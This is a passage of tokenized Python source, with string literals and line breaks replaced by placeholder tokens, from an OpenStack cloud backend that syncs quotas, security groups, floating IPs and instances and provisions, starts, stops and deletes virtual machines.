get_backend_ram_size ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> } <EOL> neutron_quota_mapping = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , lambda x : x ) , <EOL> } <EOL> def extract_backend_quotas ( mapping ) : <EOL> return { <EOL> backend_name : get_backend_value ( quotas [ name ] ) <EOL> for name , ( backend_name , get_backend_value ) in mapping . items ( ) <EOL> if name in quotas and quotas [ name ] is not None <EOL> } <EOL> cinder_quotas = extract_backend_quotas ( cinder_quota_mapping ) <EOL> nova_quotas = extract_backend_quotas ( nova_quota_mapping ) <EOL> neutron_quotas = extract_backend_quotas ( neutron_quota_mapping ) <EOL> if not ( cinder_quotas or nova_quotas or neutron_quotas ) : <EOL> return <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> try : <EOL> if cinder_quotas : <EOL> cinder = self . create_cinder_client ( session ) <EOL> cinder . quotas . update ( membership . tenant_id , ** cinder_quotas ) <EOL> except cinder_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , membership , cinder_quotas ) <EOL> try : <EOL> if nova_quotas : <EOL> nova = self . create_nova_client ( session ) <EOL> nova . quotas . update ( membership . tenant_id , ** nova_quotas ) <EOL> except nova_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , membership , nova_quotas ) <EOL> try : <EOL> if neutron_quotas : <EOL> neutron = self . create_neutron_client ( session ) <EOL> neutron . update_quota ( membership . tenant_id , { '<STR_LIT>' : neutron_quotas } ) <EOL> except neutron_exceptions . ClientException : <EOL> logger . exception ( '<STR_LIT>' , membership , neutron_quotas ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , membership , quotas ) <EOL> six . 
reraise ( CloudBackendError , e ) <EOL> def push_security_groups ( self , membership , is_membership_creation = False ) : <EOL> logger . debug ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nc_security_groups = membership . security_groups . all ( ) <EOL> if not is_membership_creation : <EOL> nc_security_groups = nc_security_groups . filter ( state__in = SynchronizationStates . STABLE_STATES ) <EOL> try : <EOL> backend_security_groups = dict ( ( str ( g . id ) , g ) for g in nova . security_groups . list ( ) if g . name != '<STR_LIT:default>' ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , membership . id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nonexistent_groups = [ ] <EOL> unsynchronized_groups = [ ] <EOL> extra_group_ids = backend_security_groups . keys ( ) <EOL> for nc_group in nc_security_groups : <EOL> if nc_group . backend_id not in backend_security_groups : <EOL> nonexistent_groups . append ( nc_group ) <EOL> else : <EOL> backend_group = backend_security_groups [ nc_group . backend_id ] <EOL> if not self . _are_security_groups_equal ( backend_group , nc_group ) : <EOL> unsynchronized_groups . append ( nc_group ) <EOL> extra_group_ids . remove ( nc_group . backend_id ) <EOL> for backend_group_id in extra_group_ids : <EOL> try : <EOL> self . delete_security_group ( backend_group_id , nova = nova ) <EOL> except CloudBackendError , e : <EOL> pass <EOL> for nc_group in unsynchronized_groups : <EOL> if nc_group . state in SynchronizationStates . STABLE_STATES : <EOL> nc_group . schedule_syncing ( ) <EOL> nc_group . save ( ) <EOL> send_task ( membership . security_groups . model . _meta . app_label , '<STR_LIT>' ) ( nc_group . uuid . 
hex ) <EOL> for nc_group in nonexistent_groups : <EOL> if nc_group . state in SynchronizationStates . STABLE_STATES : <EOL> nc_group . schedule_syncing ( ) <EOL> nc_group . save ( ) <EOL> send_task ( membership . security_groups . model . _meta . app_label , '<STR_LIT>' ) ( nc_group . uuid . hex ) <EOL> def create_security_group ( self , security_group , nova ) : <EOL> logger . debug ( '<STR_LIT>' , security_group . uuid ) <EOL> try : <EOL> backend_security_group = nova . security_groups . create ( name = security_group . name , description = '<STR_LIT>' ) <EOL> security_group . backend_id = backend_security_group . id <EOL> security_group . save ( ) <EOL> self . push_security_group_rules ( security_group , nova ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , security_group . uuid ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , security_group . uuid ) <EOL> def delete_security_group ( self , backend_id , nova ) : <EOL> logger . debug ( '<STR_LIT>' , backend_id ) <EOL> try : <EOL> nova . security_groups . delete ( backend_id ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , backend_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , backend_id ) <EOL> def update_security_group ( self , security_group , nova ) : <EOL> logger . debug ( '<STR_LIT>' , security_group . uuid ) <EOL> try : <EOL> backend_security_group = nova . security_groups . find ( id = security_group . backend_id ) <EOL> if backend_security_group . name != security_group . name : <EOL> nova . security_groups . update ( <EOL> backend_security_group , name = security_group . name , description = '<STR_LIT>' ) <EOL> self . push_security_group_rules ( security_group , nova ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , security_group . uuid ) <EOL> six . 
reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' , security_group . uuid ) <EOL> def pull_security_groups ( self , membership ) : <EOL> SecurityGroup = membership . security_groups . model <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> try : <EOL> backend_security_groups = nova . security_groups . list ( ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , membership . id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nonexistent_groups = [ ] <EOL> unsynchronized_groups = [ ] <EOL> extra_groups = membership . security_groups . exclude ( <EOL> backend_id__in = [ g . id for g in backend_security_groups ] , <EOL> ) <EOL> with transaction . atomic ( ) : <EOL> for backend_group in backend_security_groups : <EOL> try : <EOL> nc_group = membership . security_groups . get ( <EOL> backend_id = backend_group . id , <EOL> ) <EOL> if not self . _are_security_groups_equal ( backend_group , nc_group ) : <EOL> unsynchronized_groups . append ( backend_group ) <EOL> except SecurityGroup . DoesNotExist : <EOL> nonexistent_groups . append ( backend_group ) <EOL> extra_groups . delete ( ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> for backend_group in unsynchronized_groups : <EOL> nc_security_group = membership . security_groups . get ( <EOL> backend_id = backend_group . id , <EOL> ) <EOL> if backend_group . name != nc_security_group . name : <EOL> nc_security_group . name = backend_group . name <EOL> nc_security_group . state = SynchronizationStates . IN_SYNC <EOL> nc_security_group . save ( ) <EOL> self . pull_security_group_rules ( nc_security_group , nova ) <EOL> logger . 
debug ( '<STR_LIT>' ) <EOL> for backend_group in nonexistent_groups : <EOL> nc_security_group = membership . security_groups . create ( <EOL> backend_id = backend_group . id , <EOL> name = backend_group . name , <EOL> state = SynchronizationStates . IN_SYNC <EOL> ) <EOL> self . pull_security_group_rules ( nc_security_group , nova ) <EOL> logger . info ( '<STR_LIT>' , nc_security_group . uuid ) <EOL> def pull_instances ( self , membership ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> except cinder_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> backend_instances = nova . servers . findall ( image = '<STR_LIT>' ) <EOL> backend_instances = dict ( ( ( f . id , f ) for f in backend_instances ) ) <EOL> with transaction . atomic ( ) : <EOL> states = ( <EOL> models . Instance . States . ONLINE , <EOL> models . Instance . States . OFFLINE , <EOL> models . Instance . States . ERRED ) <EOL> nc_instances = models . Instance . objects . filter ( <EOL> state__in = states , <EOL> cloud_project_membership = membership , <EOL> ) <EOL> nc_instances = dict ( ( ( i . backend_id , i ) for i in nc_instances ) ) <EOL> backend_ids = set ( backend_instances . keys ( ) ) <EOL> nc_ids = set ( nc_instances . keys ( ) ) <EOL> for instance_id in nc_ids - backend_ids : <EOL> nc_instance = nc_instances [ instance_id ] <EOL> nc_instance . set_erred ( ) <EOL> nc_instance . save ( ) <EOL> for instance_id in nc_ids & backend_ids : <EOL> backend_instance = backend_instances [ instance_id ] <EOL> nc_instance = nc_instances [ instance_id ] <EOL> nc_instance . state = self . _get_instance_state ( backend_instance ) <EOL> if nc_instance . key_name != backend_instance . 
key_name : <EOL> if backend_instance . key_name is None : <EOL> nc_instance . key_name = "<STR_LIT>" <EOL> else : <EOL> nc_instance . key_name = backend_instance . key_name <EOL> nc_instance . key_fingerprint = "<STR_LIT>" <EOL> ips = self . _get_instance_ips ( backend_instance ) <EOL> nc_instance . internal_ips = ips . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nc_instance . external_ips = ips . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> nc_instance . save ( ) <EOL> def pull_resource_quota ( self , membership ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> neutron = self . create_neutron_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> logger . debug ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> nova_quotas = nova . quotas . get ( tenant_id = membership . tenant_id ) <EOL> cinder_quotas = cinder . quotas . get ( tenant_id = membership . tenant_id ) <EOL> neutron_quotas = neutron . show_quota ( tenant_id = membership . tenant_id ) [ '<STR_LIT>' ] <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , membership . tenant_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , membership . tenant_id ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , self . get_core_ram_size ( nova_quotas . ram ) ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , nova_quotas . cores ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , self . get_core_disk_size ( cinder_quotas . gigabytes ) ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> membership . set_quota_limit ( '<STR_LIT>' , neutron_quotas [ '<STR_LIT>' ] ) <EOL> membership . 
set_quota_limit ( '<STR_LIT>' , nova_quotas . instances ) <EOL> def pull_resource_quota_usage ( self , membership ) : <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> logger . debug ( '<STR_LIT>' , membership . tenant_id ) <EOL> try : <EOL> volumes = cinder . volumes . list ( ) <EOL> snapshots = cinder . volume_snapshots . list ( ) <EOL> flavors = dict ( ( flavor . id , flavor ) for flavor in nova . flavors . list ( ) ) <EOL> instances = nova . servers . list ( ) <EOL> security_groups = nova . security_groups . list ( ) <EOL> except ( nova_exceptions . ClientException , cinder_exceptions . ClientException ) as e : <EOL> logger . exception ( <EOL> '<STR_LIT>' , <EOL> membership . tenant_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( <EOL> '<STR_LIT>' , <EOL> membership . tenant_id ) <EOL> instance_flavor_ids = [ instance . flavor [ '<STR_LIT:id>' ] for instance in instances ] <EOL> ram = <NUM_LIT:0> <EOL> vcpu = <NUM_LIT:0> <EOL> for flavor_id in instance_flavor_ids : <EOL> try : <EOL> flavor = flavors . get ( flavor_id , nova . flavors . get ( flavor_id ) ) <EOL> except nova_exceptions . NotFound : <EOL> logger . warning ( '<STR_LIT>' , flavor_id ) <EOL> continue <EOL> ram += self . get_core_ram_size ( getattr ( flavor , '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> vcpu += getattr ( flavor , '<STR_LIT>' , <NUM_LIT:0> ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , ram ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , vcpu ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , len ( instances ) , fail_silently = True ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , len ( instances ) , fail_silently = True ) <EOL> membership . 
set_quota_usage ( '<STR_LIT>' , sum ( [ self . get_core_disk_size ( v . size ) for v in volumes + snapshots ] ) ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , len ( security_groups ) ) <EOL> membership . set_quota_usage ( '<STR_LIT>' , len ( sum ( [ sg . rules for sg in security_groups ] , [ ] ) ) ) <EOL> def pull_floating_ips ( self , membership ) : <EOL> logger . debug ( '<STR_LIT>' , membership . id ) <EOL> try : <EOL> session = self . create_session ( membership = membership ) <EOL> neutron = self . create_neutron_client ( session ) <EOL> except keystone_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> try : <EOL> backend_floating_ips = { <EOL> ip [ '<STR_LIT:id>' ] : ip <EOL> for ip in self . get_floating_ips ( membership . tenant_id , neutron ) <EOL> if ip . get ( '<STR_LIT>' ) and ip . get ( '<STR_LIT:status>' ) <EOL> } <EOL> except neutron_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> nc_floating_ips = dict ( <EOL> ( ip . backend_id , ip ) for ip in membership . floating_ips . all ( ) ) <EOL> backend_ids = set ( backend_floating_ips . keys ( ) ) <EOL> nc_ids = set ( nc_floating_ips . keys ( ) ) <EOL> with transaction . atomic ( ) : <EOL> for ip_id in nc_ids - backend_ids : <EOL> ip = nc_floating_ips [ ip_id ] <EOL> ip . delete ( ) <EOL> logger . info ( '<STR_LIT>' , ip . uuid ) <EOL> for ip_id in backend_ids - nc_ids : <EOL> ip = backend_floating_ips [ ip_id ] <EOL> created_ip = membership . floating_ips . create ( <EOL> status = ip [ '<STR_LIT:status>' ] , <EOL> backend_id = ip [ '<STR_LIT:id>' ] , <EOL> address = ip [ '<STR_LIT>' ] , <EOL> backend_network_id = ip [ '<STR_LIT>' ] <EOL> ) <EOL> logger . info ( '<STR_LIT>' , created_ip . uuid ) <EOL> for ip_id in nc_ids & backend_ids : <EOL> nc_ip = nc_floating_ips [ ip_id ] <EOL> backend_ip = backend_floating_ips [ ip_id ] <EOL> if nc_ip . 
status != backend_ip [ '<STR_LIT:status>' ] or nc_ip . address != backend_ip [ '<STR_LIT>' ] or nc_ip . backend_network_id != backend_ip [ '<STR_LIT>' ] : <EOL> if not ( nc_ip . status == '<STR_LIT>' and backend_ip [ '<STR_LIT:status>' ] == '<STR_LIT>' ) : <EOL> nc_ip . status = backend_ip [ '<STR_LIT:status>' ] <EOL> nc_ip . address = backend_ip [ '<STR_LIT>' ] <EOL> nc_ip . backend_network_id = backend_ip [ '<STR_LIT>' ] <EOL> nc_ip . save ( ) <EOL> logger . debug ( '<STR_LIT>' , nc_ip . uuid ) <EOL> def get_resource_stats ( self , auth_url ) : <EOL> logger . debug ( '<STR_LIT>' , auth_url ) <EOL> try : <EOL> session = self . create_session ( keystone_url = auth_url ) <EOL> nova = self . create_nova_client ( session ) <EOL> stats = self . get_hypervisors_statistics ( nova ) <EOL> if '<STR_LIT>' in stats : <EOL> nc_settings = getattr ( settings , '<STR_LIT>' , { } ) <EOL> openstacks = nc_settings . get ( '<STR_LIT>' , ( ) ) <EOL> try : <EOL> openstack = next ( o for o in openstacks if o [ '<STR_LIT>' ] == auth_url ) <EOL> cpu_overcommit_ratio = openstack . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> except StopIteration as e : <EOL> logger . debug ( '<STR_LIT>' , auth_url ) <EOL> cpu_overcommit_ratio = <NUM_LIT:1> <EOL> stats [ '<STR_LIT>' ] = stats [ '<STR_LIT>' ] * cpu_overcommit_ratio <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , auth_url ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' , auth_url ) <EOL> return stats <EOL> def pull_service_statistics ( self , cloud_account , service_stats = None ) : <EOL> if not service_stats : <EOL> service_stats = self . get_resource_stats ( cloud_account . auth_url ) <EOL> cloud_stats = dict ( ( s . key , s ) for s in cloud_account . stats . all ( ) ) <EOL> for key , val in service_stats . items ( ) : <EOL> stats = cloud_stats . pop ( key , None ) <EOL> if stats : <EOL> stats . 
value = val <EOL> stats . save ( ) <EOL> else : <EOL> cloud_account . stats . create ( key = key , value = val ) <EOL> if cloud_stats : <EOL> cloud_account . stats . delete ( key__in = cloud_stats . keys ( ) ) <EOL> return service_stats <EOL> def provision_instance ( self , instance , backend_flavor_id , system_volume_id = None , data_volume_id = None ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> image = membership . cloud . images . get ( <EOL> template = instance . template , <EOL> ) <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> cinder = self . create_cinder_client ( session ) <EOL> neutron = self . create_neutron_client ( session ) <EOL> try : <EOL> neutron . show_network ( membership . internal_network_id ) <EOL> except neutron_exceptions . NeutronClientException : <EOL> logger . exception ( '<STR_LIT>' , <EOL> membership . internal_network_id ) <EOL> raise CloudBackendError ( '<STR_LIT>' ) <EOL> if instance . key_name : <EOL> safe_key_name = self . sanitize_key_name ( instance . key_name ) <EOL> matching_keys = [ <EOL> key <EOL> for key in nova . keypairs . findall ( fingerprint = instance . key_fingerprint ) <EOL> if key . name . endswith ( safe_key_name ) <EOL> ] <EOL> matching_keys_count = len ( matching_keys ) <EOL> if matching_keys_count >= <NUM_LIT:1> : <EOL> if matching_keys_count > <NUM_LIT:1> : <EOL> logger . warning ( '<STR_LIT>' + <EOL> '<STR_LIT>' , <EOL> matching_keys_count , instance . key_fingerprint ) <EOL> backend_public_key = matching_keys [ <NUM_LIT:0> ] <EOL> elif matching_keys_count == <NUM_LIT:0> : <EOL> logger . error ( '<STR_LIT>' , <EOL> instance . key_fingerprint ) <EOL> instance . key_name = '<STR_LIT>' <EOL> instance . 
key_fingerprint = '<STR_LIT>' <EOL> backend_public_key = None <EOL> else : <EOL> backend_public_key = matching_keys [ <NUM_LIT:0> ] <EOL> else : <EOL> backend_public_key = None <EOL> backend_flavor = nova . flavors . get ( backend_flavor_id ) <EOL> if not system_volume_id : <EOL> system_volume_name = '<STR_LIT>' . format ( instance . name ) <EOL> logger . info ( '<STR_LIT>' , system_volume_name , instance . uuid ) <EOL> size = self . get_backend_disk_size ( instance . system_volume_size ) <EOL> system_volume = cinder . volumes . create ( <EOL> size = size , <EOL> display_name = system_volume_name , <EOL> display_description = '<STR_LIT>' , <EOL> imageRef = image . backend_id , <EOL> ) <EOL> system_volume_id = system_volume . id <EOL> if not data_volume_id : <EOL> data_volume_name = '<STR_LIT>' . format ( instance . name ) <EOL> logger . info ( '<STR_LIT>' , data_volume_name , instance . uuid ) <EOL> size = self . get_backend_disk_size ( instance . data_volume_size ) <EOL> data_volume = cinder . volumes . create ( <EOL> size = size , <EOL> display_name = data_volume_name , <EOL> display_description = '<STR_LIT>' , <EOL> ) <EOL> data_volume_id = data_volume . id <EOL> if not self . _wait_for_volume_status ( system_volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , system_volume_id , <EOL> ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> if not self . _wait_for_volume_status ( data_volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , data_volume_id , <EOL> ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> security_group_ids = instance . security_groups . values_list ( '<STR_LIT>' , flat = True ) <EOL> server_create_parameters = dict ( <EOL> name = instance . 
name , <EOL> image = None , <EOL> flavor = backend_flavor , <EOL> block_device_mapping_v2 = [ <EOL> { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : system_volume_id , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : data_volume_id , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> ] , <EOL> nics = [ <EOL> { '<STR_LIT>' : membership . internal_network_id } <EOL> ] , <EOL> key_name = backend_public_key . name if backend_public_key is not None else None , <EOL> security_groups = security_group_ids , <EOL> ) <EOL> if membership . availability_zone : <EOL> server_create_parameters [ '<STR_LIT>' ] = membership . availability_zone <EOL> if instance . user_data : <EOL> server_create_parameters [ '<STR_LIT>' ] = instance . user_data <EOL> server = nova . servers . create ( ** server_create_parameters ) <EOL> instance . backend_id = server . id <EOL> instance . system_volume_id = system_volume_id <EOL> instance . data_volume_id = data_volume_id <EOL> instance . save ( ) <EOL> if not self . _wait_for_instance_status ( server . id , nova , '<STR_LIT>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> instance . uuid , <EOL> ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> instance . start_time = timezone . now ( ) <EOL> instance . save ( ) <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> server = nova . servers . get ( server . id ) <EOL> fixed_address = server . addresses . values ( ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> except ( nova_exceptions . ClientException , KeyError , IndexError ) : <EOL> logger . exception ( '<STR_LIT>' , <EOL> instance . uuid ) <EOL> else : <EOL> instance . internal_ips = fixed_address <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . 
uuid ) <EOL> self . push_floating_ip_to_instance ( server , instance , nova ) <EOL> except ( glance_exceptions . ClientException , <EOL> cinder_exceptions . ClientException , <EOL> nova_exceptions . ClientException , <EOL> neutron_exceptions . NeutronClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> licenses = instance . instance_licenses . all ( ) <EOL> event_logger . instance_licenses . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { <EOL> '<STR_LIT>' : instance , <EOL> '<STR_LIT>' : [ l . template_license . license_type for l in licenses ] , <EOL> '<STR_LIT>' : [ l . template_license . service_type for l in licenses ] , <EOL> } <EOL> ) <EOL> def start_instance ( self , instance ) : <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> backend_instance = nova . servers . find ( id = instance . backend_id ) <EOL> backend_instance_state = self . _get_instance_state ( backend_instance ) <EOL> if backend_instance_state == models . Instance . States . ONLINE : <EOL> logger . warning ( '<STR_LIT>' , instance . uuid ) <EOL> instance . start_time = timezone . now ( ) <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . 
info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> return <EOL> nova . servers . start ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> instance . start_time = timezone . now ( ) <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> def stop_instance ( self , instance ) : <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> backend_instance = nova . servers . find ( id = instance . backend_id ) <EOL> backend_instance_state = self . _get_instance_state ( backend_instance ) <EOL> if backend_instance_state == models . Instance . States . OFFLINE : <EOL> logger . warning ( '<STR_LIT>' , instance . uuid ) <EOL> instance . start_time = None <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> return <EOL> nova . servers . 
stop ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> instance . start_time = None <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> def restart_instance ( self , instance ) : <EOL> logger . debug ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> nova . servers . reboot ( instance . backend_id ) <EOL> if not self . _wait_for_instance_status ( instance . backend_id , nova , '<STR_LIT>' , retries = <NUM_LIT> ) : <EOL> logger . error ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . exception ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . 
reraise ( CloudBackendError , e ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . info ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> def delete_instance ( self , instance ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> try : <EOL> membership = instance . cloud_project_membership <EOL> session = self . create_session ( membership = membership ) <EOL> nova = self . create_nova_client ( session ) <EOL> nova . servers . delete ( instance . backend_id ) <EOL> if not self . _wait_for_instance_deletion ( instance . backend_id , nova ) : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> raise CloudBackendError ( '<STR_LIT>' % instance . uuid ) <EOL> else : <EOL> self . release_floating_ip_from_instance ( instance ) <EOL> except nova_exceptions . ClientException as e : <EOL> logger . info ( '<STR_LIT>' , instance . uuid ) <EOL> event_logger . instance . error ( <EOL> '<STR_LIT>' , <EOL> event_type = '<STR_LIT>' , <EOL> event_context = { '<STR_LIT>' : instance } ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : 